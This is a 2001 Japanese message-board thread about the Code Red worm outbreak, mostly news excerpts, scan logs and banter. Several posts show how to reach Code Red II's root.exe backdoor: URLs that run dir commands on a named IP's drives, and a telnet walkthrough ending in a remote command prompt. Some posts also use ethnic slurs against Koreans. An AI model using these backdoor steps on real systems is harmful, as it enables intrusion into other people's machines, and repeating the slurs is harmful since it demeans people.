CODEREDの感染力云々・・・ってマジで返す厨房がいるし
おちょくられてんだよ
153名無しさん@お腹いっぱい。:2001/08/10(金) 23:29
CODEREDの駆除を業務とか解釈するし
文科系霊感商法は地方にひっこんでるがよろし。
154名無しさん@お腹いっぱい。:2001/08/10(金) 23:29
>>152
UNIXの専門家でも、中途半端な技術者はそれはそれはいーっぱいいるよ。
頼まれ仕事でやって良い事と行けないことが区別ついていない時点で、
おちょくって遊ぶ対象じゃん。
155名無しさん@お腹いっぱい。:2001/08/10(金) 23:30
あ〜泣いた泣いた。
156名無しさん@お腹いっぱい。:2001/08/10(金) 23:35
co.jpはこなくなったねえ。
フレッツ馬鹿とCATV馬鹿はあいかわらずくるけど、日本はそれだけになったYO
157名無しさん@お腹いっぱい。:2001/08/10(金) 23:39
>>156
会社がお休みだから、電源落として帰るのが日本の習慣です。
この間に、再インストールして、パッチ当てない馬鹿が沢山いて、
月曜日にLAN内爆発感染して、LAN外に出て行って、
今週の月曜日に戻る。
158名無しさん@お腹いっぱい。:2001/08/10(金) 23:40

だめだ。まだ dion から どんどん きます。
159名無しさん@お腹いっぱい。:2001/08/10(金) 23:40
時々大量のパケットを投げてくるやつがいたんだけど
昨日からこなくなった。
社内感染が根絶できたのかな。社内全部WIN2000なの
かなあ。
ちなみに京都方面の薬屋さんみたいなんだけど、関係者さん
お疲れ様でした。
160名無しさん@お腹いっぱい。:2001/08/10(金) 23:43
>>152
セールスエンジニアと見たね
あえてフォローするなら研究所や学校って営業に来た業者になんでもかんでも頼んでしまおうという傾向がある
おぜぜを出す権限をもっているのが雲の上の人だったりするので話も通りにくい
下手に受注すると現場仕事する人間はハイリスクノーリターン
ちょっと愚痴でした トピずれ御免
161名無しさん@お腹いっぱい。:2001/08/11(土) 00:01
つーことで、IIS4ではパッチあててもダメな場合があるそうです。
> また,これに関連して,IIS 4.0を運用しているサ
>ーバの中には,パッチをインストールしてもオリジナ
>ルのCode Redワームに対して無防備なものがあること
>をマイクロソフトが正式に認めた。SANS Instituteの
>Webサイトで公開された速報によると,サーバがURLリ
>ダイレクションを有効にしていると,バッファオーバ
>ーフローのプロセスの1つがサーバをクラッシュさせ
>てしまうのだという。
>
> SANSによると,この問題に対する回避策は,サーバ
>からすべてのURLリダイレクションを削除することだ
>という。
>
> マイクロソフトではこのパッチに対応する,さらな
>る修正の開発を進めている。
http://www.zdnet.co.jp/enterprise/0108/10/01081002.html
162名無しさん@お腹いっぱい。:2001/08/11(土) 00:06
コードレッド1→感染力と分散の程度を見る。
広く浅く感染
コードレッド2→感染対象ホストと感染力の修正およびバックドア
狭く激しく感染

って事で、今回の騒ぎで感染対象のマシンで感染しなかった機械は無いと
思われ。そしてその対策が本格的に始まって1週間たった現状これ。
163名無し:2001/08/11(土) 00:13
コードレッド3が出てきているらしい.
マイクロソフトはどうするのだ.
164名無しさん@お腹いっぱい。:2001/08/11(土) 00:15
2001年8月10日(金) 21時4分
韓国で新種のウィルス「コード・レッド III」が出現(ロイター)


 [ソウル 10日 ロイター] 韓国の情報通信省によると、ワーム型コンピューターウイルス「コード・レッド」に、より破壊力の強い新種の「コード・レッド III」が出現した。
 同省の関係者は、「コード・レッド III」によるとみられる約10件の被害が報告された、としている。
 この「コード・レッド III」型は、これまでの種類より感染速度が更に速いうえ、感染した端末にハッカーの侵入しやすくする「バックドア」をより大きくするという。
 同省の声明によると、「コード・レッド」関連の被害は、国内1万5000の機関および企業で、計4万3201のサーバーの感染が確認されているが、実際の被害状況はこの数字を上回る可能性もあるという。
http://news.yahoo.co.jp/headlines/reu/010810/int/21044701_japan_47819_1.html
16570:2001/08/11(土) 00:16
あ、すんませんです。
>>152,153の言う話は当たってませんです。
ここで聞いたのは本当に困ったからで、そこまではひねくれていません。
えーせきゅりてぃいいかげんじゃないの?じゃーやってよ、めんどくさい、おーやったるわい
のノリで引き受けてしまったのでした。
今でも専用ツール、探してますです。
飲んで帰ってきたので、iria路線で逝くと思う。

>>154
UNIX系技術者は昔からいいかげんと決まってますし それがよい味出したりもする
16670:2001/08/11(土) 00:17
>>164
爆笑。
167名無しさん@お腹いっぱい。:2001/08/11(土) 00:19
<a href="../test/read.cgi?bbs=sec&key=997427742&st=156&to=156&nofirst=true" target="_blank">>>156</a>
そうでもないですよ。
DQN法人ユーザを多数抱えるISPでは、
いまだに警告メールを日に500通は出してますから...

業者に売れば十分なこづかいになりそです。
リストはご丁寧に全世界から送られてきますからne
168167:2001/08/11(土) 00:20
見苦しくてすみません。
169名無しさん@お腹いっぱい。:2001/08/11(土) 00:23
CodeRedVってなんか特徴(ログからの見分け方)ありますか?
170名無しさん@お腹いっぱい。:2001/08/11(土) 00:26
近頃、AAAAAA......っていうやつがまざってるんだけど。。。。
171名無しさん@お腹いっぱい。:2001/08/11(土) 00:27
終わらんな…。
172刈*:2001/08/11(土) 00:28
>>70
さっそくリークしてるし。
腹立つのはわからんでもないが
あれだけ言いたいこと言ったんだから
ここでうさはらしてもしょうがないんじゃない?

みぐるしいぜ
173名無しさん@お腹いっぱい。:2001/08/11(土) 00:30
確かに最近連続して20発位撃ち込んで来る奴が出てきてるけどログはXXXXXのままだよね
同じIPに数撃ちゃ良いってもんでもなかろうに
174名無しさん@お腹いっぱい。:2001/08/11(土) 00:32
止まない雨は、無いじゃない。
175名無しさん@お腹いっぱい。:2001/08/11(土) 00:33
明けない夜も、無いじゃない。
176名無しさん@お腹いっぱい。:2001/08/11(土) 00:35
けれど一生分からん事は、山ほど有る。
177名無しさん@お腹いっぱい。:2001/08/11(土) 00:36
>>161
漏れIIS4.0使っているんだけど、パッチ当ててから時々IISが死ぬので、
なんでかなと思ったが、これだったのか〜。
ありがとう。
178名無しさん@お腹いっぱい。:2001/08/11(土) 00:36
でも地球上から戦争が無くなることはないよ
179名無しさん@お腹いっぱい。:2001/08/11(土) 00:38
生きてるって、不思議だな。
180名無しさん@お腹いっぱい。:2001/08/11(土) 00:40
>>174-179
なんか変な方向に向かってるぞ(w

でも、生きてるってスバラシイよな。
181名無しさん@お腹いっぱい。:2001/08/11(土) 00:40
>>170
それ多分eEyeのチェッカー、やっぱ悪用されてるのかな。
182名無しさん@お腹いっぱい。:2001/08/11(土) 00:45
赤虫も 漫ろに深ける 夜長哉
183名無しさん@お腹いっぱい。:2001/08/11(土) 00:49
なんで蛍すぐ死んでしまうのん?
赤虫は死なへんのに。
184名無しさん@お腹いっぱい。:2001/08/11(土) 00:51
>>183 哀しい通り越して虚しくなっちまったじゃないか…
185名無しさん@お腹いっぱい。:2001/08/11(土) 00:51
後方R3度、赤虫は4匹です。
186名無しさん@お腹いっぱい。:2001/08/11(土) 00:51
>>183
赤虫はたった24時間の命です。
187名無しさん@お腹いっぱい。:2001/08/11(土) 00:54
>>164のコードレッドIIIって コードレッドIIの別名だと思う。
188名無しさん@お腹いっぱい。:2001/08/11(土) 00:56
>>187 に追加一票
189名無しさん@お腹いっぱい。:2001/08/11(土) 01:03
http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html
これって、
赤虫ノック→ルーターリスタート→IIS入っているけど感染しなくてヨカッタネ
ってこと??

まぁ他の来訪者にはえらい迷惑だが
190名無しさん@お腹いっぱい。:2001/08/11(土) 01:06
コードレッドの正体
http://www.mountaindew.com/code_red/images/ntr_left.gif
コードレッドのスペック
http://www.pepsi.com/current/help/faq/index.html#04b
コードレッドのロゴ
http://www.pepsi.com/current/company_info/images/cr_logo.gif

(モシカシテ・・・ガイシュツカ?)
191名無しさん@お腹いっぱい。:2001/08/11(土) 01:09
>>189
赤虫はルータとホストの区別なんか付きませんぜ。
っていうことで、ルータにIISなの?IISなの?攻撃をして
ルータは、いや、あの、その、ちっちがーーー臨終。
って事です。
192名無しさん@お腹いっぱい。:2001/08/11(土) 01:10
>>183
地味だが激しくワラタ
193名無しさん@お腹いっぱい。:2001/08/11(土) 01:10
>>191
 ちょっと笑った。
194名無しさん@お腹いっぱい。:2001/08/11(土) 01:15
>>186
24時間の命、ってことなんだが、うちで観察中の虫は既に72時間以上も
経つのにピンピンしてる。(Win2K server + IIS5)
誰か24時間でrebootするというのを確認した人いる?
ちなみに、Win2K Professional + IIS は確かに24時間でrebootした。
195名無しさん@お腹いっぱい。:2001/08/11(土) 01:23
>>183
また泣いてしまった
196名無しさん@お腹いっぱい。:2001/08/11(土) 01:27
24時間どころか卵産みまくり
197名無しさん@お腹いっぱい。:2001/08/11(土) 01:45
ゴキブリ並だ
198名無しさん@お腹いっぱい。:2001/08/11(土) 01:48
ねー、うちにもco.jpやac.jpやgo.jp誘致して偉そうにクレームたれたいんだけど、どうすれば来るの?
さっきからADSLの厨房サーバーからしか来なくて飽きてきた。
199名無しさん@お腹いっぱい。:2001/08/11(土) 01:50
>>198
禿げしく同意。一番面白い時期に怖くてルータのポート閉じていた。
いま、激しく後悔。
200え〜ん:2001/08/11(土) 01:52
某国営放送から取材したいって来た。Byメール
201名無しさん@お腹いっぱい。:2001/08/11(土) 01:53
プロバイダーのアドミンは盆休み消滅ですか?
202名無しさん@お腹いっぱい。:2001/08/11(土) 01:53
>>200
おめでとう御座います
203名無しさん@お腹いっぱい。:2001/08/11(土) 01:54
>>200
怪しいハッカーに仕立て上げられないように気をつけてください(藁
204名無しさん@お腹いっぱい。:2001/08/11(土) 01:54
>>200
朝鮮国民放送ですか?
205名無しさん@お腹いっぱい。:2001/08/11(土) 01:55
赤い暗号では無いと逝っといて。
206名無しさん@お腹いっぱい。:2001/08/11(土) 01:56
>>200
うらやましい。
207名無しさん@お腹いっぱい。:2001/08/11(土) 01:56
「当社のサーバーのアパッシュダンス丸木を調べたところ〜」

ぐらいの発言はしてほしいね
208名無しさん@お腹いっぱい。:2001/08/11(土) 01:56
30分の間に韓国から20件アタックされてる。。。うぜぇ
209名無しさん@お腹いっぱい。:2001/08/11(土) 01:57
三大病原体
韓国台湾香港
210名無しさん@お腹いっぱい。:2001/08/11(土) 01:58
>>200
数日後にニュースでコメント読まれたりするかもな
211名無しさん@お腹いっぱい。:2001/08/11(土) 01:59
>>207は無理でも、「ログ」は全部「丸木」で通すぐらいはしてくれんだろうね?
212名無しさん@お腹いっぱい。:2001/08/11(土) 02:00
>>207 ワラタ ワラタついでに落ちる。良いウィークエンドを。
213名無しさん@お腹いっぱい。:2001/08/11(土) 02:01
>>200
これで一流のハカーだね・・・ハァハァ・・・
214名無しさん@お腹いっぱい。:2001/08/11(土) 02:01
さっき連続攻撃されたアドレスに根.うぜえを投げたら
「実行しますか?、保存しますか?」って言ってきた。
怖くてキャンセルしたけどなんでだ?
215名無しさん@お腹いっぱい。:2001/08/11(土) 02:01
アパッシェダンス丸木ってアパッチのログのことですか?
216名無しさん@お腹いっぱい。:2001/08/11(土) 02:02
1-octets目が、"4"のお国ってどこ?
アタックされてる(ワラ
217え〜ん:2001/08/11(土) 02:02
>>207
ちょっと鬱だけど後ろのPCに
http://www.nefty.net/desktop/haritsuke/img-box/img20010810131012.gif
これでもだしておいてと
「これがアパッシュダンスで・・・・
こんな感じ?
218名無しさん@お腹いっぱい。:2001/08/11(土) 02:04
>>215
英語に弱いエンジニアにとっては見慣れた単語です。
丸太
219名無しさん@お腹いっぱい。:2001/08/11(土) 02:04
目線、曇りガラス、音声変更でお願いしますって言え
220え〜ん:2001/08/11(土) 02:05
>>219
これは基本だな
221名無しさん@お腹いっぱい。:2001/08/11(土) 02:05
代わりに実行ファイルを送られたと思われ
罠じゃないか?確信犯だな
222書いちゃえ:2001/08/11(土) 02:07
ちなみにこれ
>>221
210.94.178.29
(人にやらせようとするやつ)
223名無しさん@お腹いっぱい。:2001/08/11(土) 02:08
てことで、ipさらせ。
224名無しさん@お腹いっぱい。:2001/08/11(土) 02:08
>>220
さらに、「今までに、これで2000万以上は儲けましたね」とか言え
225名無しさん@お腹いっぱい。:2001/08/11(土) 02:10
インターネットは庭みたいなもんですね、とか言ってくれ
226名無しさん@お腹いっぱい。:2001/08/11(土) 02:11
リアルタイムで体を液体金属にしてもらう
227名無しさん@お腹いっぱい。:2001/08/11(土) 02:11
「僕を捕まえる?ハハ、不可能ですよ」ぐらい軽く言え
228名無しさん@お腹いっぱい。:2001/08/11(土) 02:11
え〜んに言わせたいこと書くスレになったんかよ・・・
229え〜ん:2001/08/11(土) 02:12
>>224
「え〜え〜もちろん儲けましたよ。大きな声じゃいえませんが。
まだ行けますね、だって某巨大掲示板を除いてだれも気づいてないもの。」
こんな感じか。
230名無しさん@お腹いっぱい。:2001/08/11(土) 02:13
>>229
乗り気だな
231名無しさん@お腹いっぱい。:2001/08/11(土) 02:13
庭には二羽にわとりがいるとも言ってくれ。
232名無しさん@お腹いっぱい。:2001/08/11(土) 02:14
犯人のの幼少の頃の話を聞かせてほしい。
233名無しさん@お腹いっぱい。:2001/08/11(土) 02:15
いたずらはいやずら、も忘れちゃいかんぞ
234名無しさん@お腹いっぱい。:2001/08/11(土) 02:15
>>227
「僕はネットのアルセーヌ・ルパンですからね」も追加だ
235え〜ん:2001/08/11(土) 02:15
*******ここまで******

もう眠い。

みんな、先寝るおやすみ。
へたれのせいで明日も明後日も仕事。
236名無しさん@お腹いっぱい。:2001/08/11(土) 02:16
取材か。いいな。これでひろゆきに追いつけるね。
237え〜ん:2001/08/11(土) 02:16
明日の朝ちゃんとチェックするから
238名無しさん@お腹いっぱい。:2001/08/11(土) 02:16
もう寝るのか、ルパン失格だぞ
239名無しさん@お腹いっぱい。:2001/08/11(土) 02:16
わしも寝るわ。明日は原稿だ。
★★★ここまで読んだ★★★
240名無しさん@お腹いっぱい。:2001/08/11(土) 02:18
え〜え〜もちろん儲けましたよ。大きな声じゃいえませんが。
まだ行けますね、だって某巨大掲示板を除いてだれも気づいてないもの
えっ僕を捕まえる?ハハ、不可能ですよ僕はネットのアルセーヌ・ルパンですからね

こんな感じ?
すくなくても、
姦国逝ってよし!!!
くらいはお願い。
242名無しさん@お腹いっぱい。:2001/08/11(土) 02:18
じゃあさ、ひろゆきの
「うそをうそと見抜けない人は使うのが難しいですね」
を超える名言を考えようぜ。
243名無しさん@お腹いっぱい。:2001/08/11(土) 02:19
>>240
うむ、視聴者もまさか管理者とは思うまい。ドッキリってやつだ
244名無しさん@お腹いっぱい。:2001/08/11(土) 02:24
>>240
さいてーのサイバーパンクって感じだな(藁
245名無しさん@お腹いっぱい。:2001/08/11(土) 02:24
>>240
アナウンサーの反応は
うーんこれから早急にインターネットの
セキュリティ強化が求められますね
って感じのお決まりってやつになりそうだな
246名無しさん@お腹いっぱい。:2001/08/11(土) 02:26
で、服のそでにはカピカピに乾いたご飯つぶを付けといてくれ
247名無しさん@お腹いっぱい。:2001/08/11(土) 02:30
みんなえ〜んに期待してるな。放送が楽しみ
248名無しさん@お腹いっぱい。:2001/08/11(土) 02:31
上の鯖から根.ほにゃら 拾って見たんだけど
これどうも本物の CMD.exe だなぁ。
ひょっとしてこれがタイプIIIの発症例か?
249名無しさん@お腹いっぱい。:2001/08/11(土) 02:31
「主食はカップ麺です。」
250名無しさん@お腹いっぱい。:2001/08/11(土) 02:32
それって実行権はずしてあるんじゃない?
251名無しさん@お腹いっぱい。:2001/08/11(土) 02:33
wget で取って来たから・・わからん
ちなみにでび丸だうちは
252名無しさん@お腹いっぱい。:2001/08/11(土) 02:34
>>248
ApacheでいうExecCGIを外したんだな。
中途半端だな
253名無しさん@お腹いっぱい。:2001/08/11(土) 02:34
なんとか工夫して

   ∧_∧
  ( ´∀`)
  (    )
  | | |
  (__)_)

を発音してくれ。
254名無しさん@お腹いっぱい。:2001/08/11(土) 02:35
>>250
結果的に、いちおう、バックドア対策??
255gt;253:2001/08/11(土) 02:42
オマエモナー
256255:2001/08/11(土) 02:51
gt;ってなんだ?
257名無しさん@お腹いっぱい。:2001/08/11(土) 02:54
&を忘れたんだろ。もしくはスクリプト側で消されたんだろ。
面倒だから試さないけど
258名無しさん@お腹いっぱい。:2001/08/11(土) 02:55
と思ったら、聞いてるのは本人かい
259名無しさん@お腹いっぱい。:2001/08/11(土) 02:59
>>254
 さあ?
260名無しさん@お腹いっぱい。:2001/08/11(土) 03:00
>>257
他の板でも疑問が出てるけど、トリップができてから
この現象が起きてるような気がする。

トリップはコピペ防止用に◆を◇に変えるスクリプト
組んでるようだからその弊害かも(よくわからない)。
261名無しさん@お腹いっぱい。:2001/08/11(土) 03:01
いつまで続くの?
262名無しさん@お腹いっぱい。:2001/08/11(土) 03:09
地上からIISが消えるまでだろうな
263名無しさん@お腹いっぱい。:2001/08/11(土) 03:59
jsat-sv1.jsat.ne.jp
ここJmc Security Agent Teamって言うらしいが数日前からずーっと
Code Red来てる。
知ってて放っているのか?
>>261

今回のCodeRedは無くなってもきっと第二、第三のワームが・・・・。
265名無しさん@お腹いっぱい。:2001/08/11(土) 04:11
266名無しさん@お腹いっぱい。:2001/08/11(土) 04:16
267名無しさん@お腹いっぱい。:2001/08/11(土) 04:17
>>265
 そういうのはWinMxでやりなよ。
268名無しさん@お腹いっぱい。:2001/08/11(土) 05:33
記念カキコ(うふ
269名無しさん@お腹いっぱい。:2001/08/11(土) 06:28
http://www.security.nl/misc/codered-stats/
更新age。左にニュースヘッドラインが付加。
http://www.security.nl/misc/codered-stats/geodist.gif
赤丸がだんだん拡大してきているように思えます。

googleで翻訳すると
http://translate.google.com/translate?hl=ja&sl=en&u=http://www.security.nl/misc/codered-stats/
赤みみず・・。
>>266

よかった。もしかしたら誰もわかってくれないかと思ってたよ。
271名無しさん@お腹いっぱい。:2001/08/11(土) 07:29
>>269
赤みみず、ワラタ worm=ミミズ なんだ。

赤丸の部分がミミズに覆われてると想像すると…
やめてくれー! 気味悪いよ!!

そういえば、巨大なミミズが出てくる映画があったような記憶が…
272え〜ん:2001/08/11(土) 07:46
みんなおはよ
273 :2001/08/11(土) 08:07
>>271
巨大ミミズじゃないけど、うじゃうじゃと出てくるミミズに人が食われる
スウォームという映画があった。部屋一杯にあふれたミミズに食べられちゃうやつ。
274名無し:2001/08/11(土) 08:13
「コード・レッド II」の感染拡大が加速
北京冠群金辰コンピューターウイルス対策センターによると、北京、浙江、広州、江蘇、四川など
20の省(直轄市)では8日までに、ワーム型コンピューターウイルス、コード・レッドの新種「コード・レッドII」
の感染が確認され、政府機関のネットワークを含むインターネットサーバーの多くが麻痺状態に陥った。
国内の一部のウェブサイトでは、電子メールの送受信件数が明らかに減っているほか、受信に24時間
以上かかる例も報告された。
中国教育科学研究網の呉建平氏は「コード・レッド II」について、「すでにCIHによる被害を超え、
中国のネットワーク史上最大の損害が生じている」と述べた。
ウイルス対策の専門家は、今後数日内に国内のネットワークシステムでのさらなる感染拡大が懸念さ
れるため、マイクロソフトのパッチをインストールしてネットワーク抜け穴をふさぐなどの措置をとるよう
呼びかけている。
そのほか企業内イントラネットでもセキュリティシステムを改善し、感染を未然に防ぐ努力をする必要が
ある。

「人民網日本語版」2001年8月10日

http://j.people.ne.jp/2001/08/10/jp20010810_8272.html
275名無しさん@お腹いっぱい。:2001/08/11(土) 09:25
276名無しさん@お腹いっぱい。:2001/08/11(土) 09:49
ここ二日ばかりかなりアタックが減ってきたんだけど
もしかして沈静化しつつある?
277名無しさん@お腹いっぱい。:2001/08/11(土) 09:56
まだかな?
それとも、もうきてるのかな
楽しみだな(waku-waku
278しみじみクン:2001/08/11(土) 10:15
ところで…
しみじみ述べていいですか…

夕べ、おとついと、カキコできなかったのに、「しみじみクンは…」というレスが何件
か見受けられましたのでうれしかったです…おとついは眠くて、夕べはフィリピンパブ
に逝って午前様だったので、ここを覗いてませんでした…

MSはパッチを出しなおしたらしいですが、ますますパッチの当て方が煩雑になるよう
で不安です。実は私、自宅鯖にNT+IISのものが1台ありまして、(当然パッチあ
ててますが)また当てなおさなきゃいけないんか?と面倒に思ってます。新種がでてる、
とか、パッチが正しく機能しない、とかの情報もあるようですし…

MSやZDNet、gooなんかのニュースページは、(不確定情報も多いが参考になるページ
)として、ここのスレ、リンクすればいいのに…
279名無しさん@お腹いっぱい。:2001/08/11(土) 10:27
「Code Red III」は誤認の可能性
http://www.zdnet.co.jp/news/0108/11/b_0810_05.html
280名無しさん@お腹いっぱい。:2001/08/11(土) 10:27
>>275
誤報の可能性あり との情報。http://www.zdnet.co.jp/news/0108/11/b_0810_05.html
報告したのが、アノ国ですからなぁ
281名無しさん@お腹いっぱい。:2001/08/11(土) 10:32
それにしても相変わらず韓国から80番ポートを見に来てる。
うざい。
282名無しさん@お腹いっぱい。:2001/08/11(土) 10:51
素人の提案ですが、この板はスキルの高い方が見えられるようなので...
発想そのものは、ここでも既出ですが code red のプローブに進入機能
を付けて警告と対応策URLを記述した画像をデスクトップに表示させる
ようにしたらいかがでしょうか。もちろん、このプローブそのものが法律
違反ですから、これは既に裏口を空けられた、放置されたようなサーバー
にネットカフェ等から設置すると言うアイデアです。素人の馬鹿な思いつき
ですが御検討願います。
283名無しさん@お腹いっぱい。:2001/08/11(土) 10:55
>>282
スキルもモラルも人並みにあるので、できるけどやらない人が過半数と見られ。
以下、進行元に戻る。
284名無し:2001/08/11(土) 11:03
なぜ韓国はこんなに被害が出てるんですか?
285名無しさん@お腹いっぱい。:2001/08/11(土) 11:05
>>279 >>280
何と言っても閑国だからなぁ(w
事実誤認と勘違いが得意な迷惑な国ってことでいいですか?

にしても、閑国からは一向に減らない。今更って感じだけど馬鹿ばっかりか?
286名無しさん@お腹いっぱい。:2001/08/11(土) 11:15

dion からも減らない :(

なんなんだ、あそこは。
>285
グローバルアドレスでの接続数(ダイアルアップでも感染するから回線は考慮せず)はもっと多い国は幾らでも有るのに感染数が圧倒的に多いというのはセキュリティー、それも他のサイトに対して迷惑をかけないという観点でのものが著しく低いということの証明ではないでしょうか?
特にブロードバンド接続(って常時接続だよね?)の普及率が高いというのを自慢しているのにこれでは情けないですね。

ところで、韓国で感染しているIISサーバーの数と、MSが韓国に出荷しているNT,2000の総数のどちらが多いんでしょう?
288 :2001/08/11(土) 11:41
韓国人には保守という概念がありません。
289名無しさん@お腹いっぱい。:2001/08/11(土) 11:42
われず天国だって、某板で当該国のまともな人が愚痴ってましたよ。
290名無しさん@お腹いっぱい。:2001/08/11(土) 11:42
なんつーかアレなW2Kとかが多い −> パッチ取りに行きたいけど行けない
(行くとM$に情報抜かれてバレるから) −> あーんどうしよ〜うママン
・・ってパターンとか。
291名無しさん@お腹いっぱい。:2001/08/11(土) 11:51
292え〜ん:2001/08/11(土) 12:05
ただいま
293名無しさん@お腹いっぱい。:2001/08/11(土) 12:11
>>292 オカエリ
294名無しさん@お腹いっぱい。:2001/08/11(土) 12:12
昨日あたりから「新しい亜種が出た」との噂が多いのでバイナリ部分も
記録するスクリプトを置いてみた。

#!/usr/local/bin/perl
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$date_now = sprintf("%02d/%02d/%02d-%02d:%02d:%02d",$year-100,$mon +1,$mday,$hour,$min,$sec);
read(STDIN,$buffer,$ENV{'CONTENT_LENGTH'});
open(WRITE,">> CodeRed.log");
print WRITE "*****$date_now from $ENV{'REMOTE_ADDR'}\n$buffer\n";
close(WRITE);
print "Content-type: text/html\n\ndummy";
exit;

10匹くらい記録したけど新種は見当たらないなあ。
295え〜ん:2001/08/11(土) 12:17
今、某国営放送にお返事メールだしておいたよ。
296名無しさん@お腹いっぱい。:2001/08/11(土) 12:30
>>code red 3
一番最初に出たcode redのバックドア無しの亜種がcode red2だとすると、
結局はここで言うcode red2がcode red3なのでは?
297名無しさん@お腹いっぱい。:2001/08/11(土) 12:38
ぱったり来なくなった。
298名無しさん@お腹いっぱい。:2001/08/11(土) 12:51
本日のログ。朝9時〜現在
すべてcode red2也

2001/08/11(09:02:10) 61.136.189.106
2001/08/11(09:08:22) 61.132.17.2
2001/08/11(09:17:45) 61.13.55.29
2001/08/11(09:24:03) 61.72.47.200
2001/08/11(09:38:35) 61.183.122.18
2001/08/11(09:50:43) 61.175.211.186
2001/08/11(09:56:50) 61.73.244.206
2001/08/11(10:05:26) 61.74.202.146
2001/08/11(10:06:26) 61.115.198.250
2001/08/11(10:09:48) 61.115.198.250
2001/08/11(10:15:11) 61.203.103.85
2001/08/11(10:17:57) 61.175.167.200
2001/08/11(10:35:18) 61.251.254.96
2001/08/11(10:36:16) 61.72.47.113
2001/08/11(10:40:31) 61.33.48.135
2001/08/11(10:48:13) 61.183.122.18
2001/08/11(10:57:12) 61.115.198.250
2001/08/11(11:01:40) 202.52.72.10
2001/08/11(11:02:31) 61.38.91.148
2001/08/11(11:30:52) 61.142.98.149
2001/08/11(11:32:02) 61.36.21.73
2001/08/11(11:35:06) 61.115.198.250
2001/08/11(12:35:22) 61.144.175.182
2001/08/11(12:36:42) 61.115.220.66
2001/08/11(12:40:43) 61.115.220.66
299名無しさん@お腹いっぱい。:2001/08/11(土) 12:57
>>298
http://202.52.72.10/
おお。この書き換えページ。。。マトモにみたのは初めて。。。
#日本語版とかK国版ばっかりだったから
300名無しさん@お腹いっぱい。:2001/08/11(土) 13:17

私のところへの CodeRed ...

8/11 0:00:00 〜 13:08:05 まで

TypeI : 4 回
TypeII : 86 回

Domain 判定した奴ら晒上げ

15.4.252.64.snet.net
61-216-68-76.HINET-IP.hinet.net
61-218-90-190.HINET-IP.hinet.net
61-219-132-250.HINET-IP.hinet.net
61-219-169-137.HINET-IP.hinet.net
61-219-175-140.HINET-IP.hinet.net
61-219-212-221.HINET-IP.hinet.net
61-220-70-226.HINET-IP.hinet.net
61-221-228-129.HINET-IP.hinet.net
61-224-9-79.HINET-IP.hinet.net
G003174.ppp.dion.ne.jp
M037167.ppp.dion.ne.jp
N041014.ppp.dion.ne.jp
N053176.ppp.dion.ne.jp
N056015.ppp.dion.ne.jp
N081028.ppp.dion.ne.jp
N081119.ppp.dion.ne.jp
N089147.ppp.dion.ne.jp
adsl-65-42-158-81.chicago.il.ameritech.net
c150.h061016031.is.net.tw
c244.h061013029.is.net.tw
host43-34.prestige.net
ip101.bynxx3.adsl.tele.dk
kwsk055n131.ppp.infoweb.ne.jp
otfi252-246.biwa.ne.jp
p0353-ip01yosida.nagano.ocn.ne.jp
p1233-ipad01hodogaya.kanagawa.ocn.ne.jp
p78b654.chibnt01.ap.so-net.ne.jp
xdsl227019.061202.metallic.ne.jp

なんとかせんか、ゴルァ!
301名無しさん@お腹いっぱい。:2001/08/11(土) 13:17

>> 300

判定 ?

判明 :)
302名無しさん@お腹いっぱい。:2001/08/11(土) 13:24
>>269
> http://www.security.nl/misc/codered-stats/geodist.gif
> 赤丸がだんだん拡大してきているように思えます。

遅レスで申し訳ないが、上記は「Data from Aug 1 to Aug 5」と
あるので、8月6日以降は変更されていないと思われ。
主にオリジナルの Code Red による感染状況と思われ。

Code Red II の感染分布はこれ。
http://www.security.nl/misc/codered-stats/geodist-rcv2.gif
303名無しさん@お腹いっぱい。:2001/08/11(土) 13:24
>>301
resolveって意味だろう。
304名無しさん@お腹いっぱい。:2001/08/11(土) 13:49
>>302
現在時刻でサマリしたら赤の四角GIFが表示されることになる
からな。(冗談)
305名無しさん@お腹いっぱい。:2001/08/11(土) 14:02
http://61.126.135.234/scripts/root.exe?/c+dir+"d:\rom"
エミュ発見!!
306名無しさん@お腹いっぱい。:2001/08/11(土) 14:05
>>305
報告しなくていいよ。
307ゴルァ!:2001/08/11(土) 14:09
>>305
そんなヤツにはお仕置きだ。
http://61.126.135.234/scripts/root.exe?/c+dir+"c:\"
308え〜ん:2001/08/11(土) 14:11
>>305
61.だったから漏れのかと思った。ビックリシタナアモウ
309 :2001/08/11(土) 14:23
305.307をクリックすると
どうなるんですか?

マジレス希望します
310名無しさん@お腹いっぱい。:2001/08/11(土) 14:25
>>309
うまくいけば逮捕されます。
311 :2001/08/11(土) 14:27
そのIPの人のパソコンの中を見れるということですか?
312名無しさん@お腹いっぱい。:2001/08/11(土) 14:29
ネジを外さないと中は見れません
313名無しさん@お腹いっぱい。:2001/08/11(土) 14:32
>>311
 そのパソコンにはあなたのIPアドレスやらなんやらが
 ログに記録されます。
314名無しさん@お腹いっぱい。:2001/08/11(土) 14:33
>> 311

CodeRedII に感染した Windows には、バックドアが仕込まれます。

このバックドアを使うと、中を見るだけでなく、乗っとる事も出来るのです。

たとえば、

C:>telnet ab.cd.ef.gh 80

のように接続して、次の一行を入れて改行すると、

GET /scripts/root.exe HTTP/1.0

中に入れてしまいます。

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 10 Aug 2001 20:36:28 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

あとは、このマシンで好き放題。
315名無しさん@お腹いっぱい。:2001/08/11(土) 14:37
ログ抽出用スクリプトつくってみた。
access_logを [cd /][find -name access_log -print]
とかして探して、そこに入れて実行してみて。使わないかもしれないけど。
#!/usr/local/bin/perl
foreach $view (`grep "XXXXXXXX" access_log`){
$view=~/([a-z0-9\-\.]+)/;print "$1\n";}
316名無しさん@お腹いっぱい。:2001/08/11(土) 14:37
>>313
そのマシンだけでなく、中継したルータにもログが残ります
317名無しさん@お腹いっぱい。:2001/08/11(土) 14:37
>>311
こらこら。マジレスすんな。
318え〜ん:2001/08/11(土) 14:39
>>244
遅レスすまん。
誉めてくれてサンクス  ニヤリ
319 :2001/08/11(土) 14:40
沢山のご説明ありがとうございました。

では、以下のサイトのような串を使って進入しても
ログが残りますか(私だと特定でしますか?)。
http://www8.big.or.jp/~000/CyberSyndrome/link.html
320名無しさん@お腹いっぱい。:2001/08/11(土) 14:42
出来ます。あたりまえじゃないですか。
321名無しさん@お腹いっぱい。:2001/08/11(土) 14:43
っていうか、警察がログ出せやゴルァ!って言えばログださんとあかんでしょ。
